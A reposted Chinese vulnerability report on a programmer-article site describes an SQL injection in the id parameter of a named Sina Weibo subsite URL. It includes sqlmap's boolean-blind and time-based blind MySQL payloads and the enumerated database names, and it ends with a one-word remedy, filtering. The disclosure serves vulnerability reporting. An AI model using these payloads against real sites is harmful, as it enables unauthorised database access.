欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

新浪微博某分站SQL注入一枚

程序员文章站 2022-04-22 11:11:43
rt 漏洞地址: https://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31...

rt

漏洞地址: https://v6.bang.weibo.com/xmt/matrix?id=21000037&from=prov&from_id=31

id参数存在注入
 

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=21000040 AND 2081=2081&period=day&date=20160329&from=class&from_id=332

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=21000040 AND (SELECT * FROM (SELECT(SLEEP(5)))NBaZ)&period=day&date=20160329&from=class&from_id=332
---
[02:13:34] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[02:13:34] [INFO] fetching database names
[02:13:34] [INFO] fetching number of databases
[02:13:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:13:34] [INFO] retrieved: 
[02:13:36] [WARNING] reflective value(s) found and filtering out
3
[02:13:45] [INFO] retrieved: information_schema
[02:16:50] [INFO] retrieved: test
[02:17:39] [INFO] retrieved: top
available databases [3]:
[*] information_schema
[*] test
[*] top

 

已证明

解决方案:

过滤